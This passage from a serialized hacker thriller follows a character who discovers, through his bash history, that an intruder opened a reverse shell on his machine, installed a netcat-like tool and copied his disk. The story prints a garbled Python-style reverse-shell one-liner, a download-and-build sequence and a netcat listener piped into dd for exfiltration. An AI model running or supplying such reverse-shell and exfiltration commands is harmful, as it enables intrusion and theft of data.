Gregor slept for short intervals on the plane. According to his smartwatch, he’d slept thirty minutes during the eight-hour flight. The CloudShield infiltration had taken more out of him than he cared to admit.

Gregor’s phone chirped. It was Jeremiah. Need operational status, the message read.

I guess sleep will have to wait, Gregor thought.

Gregor checked his covert channels. His associate hadn’t checked in for a while now, and he had to be certain that Black Iris was not planning a counterattack. Gregor read over the last message received.

Comrade,

If you are reading this, then either I have failed and am lying in a ditch somewhere, or I’m stuck in a pub.

Thanks for choosing me, and if I did pass out in a pub for more than twenty-four hours, prompting this automatic delivery, I give you permission to finish me off. Either way, I’m a dead man.

Best regards,

Allan

Farewell, my friend, Gregor thought.

Forty minutes later, Gregor entered Jeremiah’s operations center: an area about the size of a large living room. Several workbenches with monitors and keyboards were set up around the entire room. Jeremiah was sitting at his workstation, which was a circular desk with monitors surrounding most of the desk. The monitors were angled so anyone sitting at the desk could see the entire room without getting up.

“What news?” Jeremiah asked.

“After checking my dashboard, the distributed denial of service attacks (DDOS) have been successful and are still ongoing. CloudShield hasn’t taken them down yet,” Gregor said.

“What about confirmation of Black Heart’s demise?”

“Negative. My operative traced her movements to a car park several blocks from the Design Center. Since he has yet to report back, I can only assume that he failed.”

“And the Collective?” Jeremiah asked.

“I’ve heard nothing from them, and there’s no chatter on the online forums, either. It seems they have gone to ground.”

“I want you to focus on infiltrating Pretzelverse Games’ Munich headquarters. I need intel on the cloning labs,” Jeremiah said.

Support the creativity of authors by visiting Royal Road for this novel and more.

“But how should I prioritize this? I’m already shorthanded,” Gregor said.

“I’m working on getting you more resources. In the interim, keep pressure on Black Iris; that is our top priority, but consider the cloning labs task a close second.”

“Affirmative,” Gregor said.

Gregor heard a familiar ping on his system. He looked at his bash history and noticed something troubling. While he’d been busy infiltrating CloudShield, someone had been running several PSnake commands in the background. A company called Alfie Bytes had created PSnake, which allowed anyone to run custom programs in order to automate certain functions of the Ninex operating system. In theory, it saved all commands run on Gregor’s system into a special history file called “bash history.” Gregor’s heart sank when he looked at his system’s bash history.

Ohh, this is not good! Gregor thought.

As a precaution, Gregor was in the habit of recording all of his keystrokes into a special hidden file that only he had access to. He ran one of his custom programs that would compare his actions against the bash history logs; the idea was to find potential intruder activity. The following command worried Gregor:

PSnake -c ‘import socket, subprocess=os, socket=INET, SOCK_STREAM; s.connect((“10.0.0.254”));os.dup(s.fileno(),0); p=subprocess.call([“/bin/sh”,”-i”]);’

The user running this code knew what they were doing, Gregor thought.

The command opened a special connection known as a reverse shell, which allowed anyone to command his system. Gregor ran a series of commands that checked his system updater profile. He noticed that several packages were not at the most current revision level. He updated the updater software, and then downloaded the updates. After a quick restart, he double-checked all versions of code on his system.

“They are not getting back on my system!” Gregor said.

Gregor then double-checked his installer logs. There was another entry he hadn’t expected, and it worried him more than he wanted to admit.

“No. . . not the kitty!

“Who is not getting back on? What is ‘the kitty?’ What are you talking about, Gregor?” Jeremiah said from behind him.

Damn—I didn’t hear him come in, Gregor thought. Sneaky bastard.

“I was just talking to myself,” Gregor said.

“Are we compromised?” Jeremiah asked.

“No—there were some people knocking on our front door is all.”

Jeremiah gave Gregor a wary look, but then he left, saying nothing else.

Gregor needed to know when the intruder had been on his system. The discovery of the kitty was unnerving. He pulled up another terminal window and added the HISTORY-TIME-FORMAT variable, which allowed him to see when each command was run. Further analysis revealed the following commands:

12-27 14:11:45 Sudo apt install netmap

12-27 14:14:23 wget http://installforge.net/projects/netkitty/files/0.1.0/netkitty-0.1.0.tar.gz

12-27 14:20:16 tar -xzvf netkitty-0.1.0.tar.gz

12:27 14:21:01 ./configure

12-27 14:33:11 sudo make

This was not good at all. Gregor just proved that an attacker had installed the netkitty program that would track all his movements, which was devastating to Gregor’s plans. He scanned the history logs for more signs of malicious behavior. He was about to give up when he noticed something strange; there was a gap in all system logging activity during a thirty-minute window. He checked the logs before and after the anomaly and noticed that they were stitched together.

Part of the log is missing!

It took a while, but Gregor was able to undelete the missing log fragment. He used a file search utility to look for specific netkitty patterns. What he found chilled his blood. Gregor analyzed all netkitty commands run on the system. The command “nk -lp 2424 | sudo dd of=/_secret/home/remote_exfil.img.gz” was proof that someone had duplicated his entire hard drive.

I’m in serious trouble, Gregor thought.